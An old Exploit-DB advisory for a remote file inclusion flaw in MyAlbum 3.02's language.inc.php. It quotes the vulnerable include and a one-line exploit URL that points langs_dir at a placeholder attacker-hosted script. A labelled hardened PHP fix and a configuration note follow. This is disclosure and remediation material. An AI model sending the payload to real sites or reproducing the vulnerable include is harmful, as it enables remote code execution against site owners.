MyAlbum 3.02 - 'language.inc.php' Remote File Inclusion

EDB-ID: 2747
Platform: PHP
Date: 2006-11-09


#==============================================================================================
#MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Vulnerability
#===============================================================================================
#
#Critical Level : hm...i think...
#
#Script Download : http://www.comscripts.com/jump.php?action=script&id=1731
#
#Version : 3.XX (maybe others...)
#
#================================================================================================
#
#Bug in :
#
#./language.inc.php
#================================================================================================
#
#Vulnerable Code :
#
#
#         include($langs_dir."/messages.".$lang.".php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[MyAlbum_DIR]/language.inc.php?langs_dir=http://evilsite.com/evilscript.txt?
#
#
#================================================================================================
#Discovered By : Silahsiz Kuvvetler The TURKISH DEVELOPER
#
#Contact : co-type[at]hotmail[dot]com
#
#GreetZ : |FATTALGAZI!| - |MADWORM| - |NARCOTIC| - |MR.TROJAN| - |TILKIANDRE| - |EDORAS| - | XVCX |
#
#AND ALL STARHACK USERZZ...
#
#Special Thanqs : str0ke - 0xyGen
#
#Shameless plug :d ===>>>>>>>>>>>>>>>>>> WWW.STARHACK.ORG <<<<<<<<<<<<<<<<<<=======
#
#==================================================================================================

# milw0rm.com [2006-11-09]
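
A hardened form of the include shown under "Vulnerable Code", added here as an example; it is not MyAlbum's code or the advisory author's. The `langs` directory location, the `en` fallback, the `resolve_language_file` helper and reading the language from `$_GET['lang']` are assumptions.

```php
<?php
// Added example: hardened replacement for the include in language.inc.php.
// Assumptions (not from MyAlbum's source): language files live in ./langs
// next to this file, "en" is the fallback, and the language is requested
// through $_GET['lang'].

// Fixed server-side path. A constant cannot be overwritten by a request
// parameter the way the global $langs_dir is in the vulnerable include.
define('MYALBUM_LANGS_DIR', __DIR__ . '/langs');

/**
 * Map a requested language code to a file inside MYALBUM_LANGS_DIR.
 * Returns the absolute path, or null if no usable file exists.
 */
function resolve_language_file($requested, $default = 'en')
{
    // Build the allowlist from files actually installed on disk.
    $allowed = array();
    foreach (glob(MYALBUM_LANGS_DIR . '/messages.*.php') ?: array() as $path) {
        if (preg_match('/^messages\.([A-Za-z0-9_-]{1,16})\.php$/', basename($path), $m)) {
            $allowed[$m[1]] = $path;
        }
    }

    // Anything that is not an exact allowlist key falls back to the default.
    $code = (is_string($requested) && isset($allowed[$requested])) ? $requested : $default;
    if (!isset($allowed[$code])) {
        return null;
    }

    // Defence in depth: after resolving symlinks, the file must still sit
    // directly inside the language directory.
    $real = realpath($allowed[$code]);
    $base = realpath(MYALBUM_LANGS_DIR);
    if ($real === false || $base === false || dirname($real) !== $base) {
        return null;
    }
    return $real;
}

$file = resolve_language_file(isset($_GET['lang']) ? $_GET['lang'] : null);
if ($file === null) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Language file not available.');
}
include $file; // only a local, allowlisted path can reach include
```

Independently of the code change, `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops `include` from fetching URLs at all.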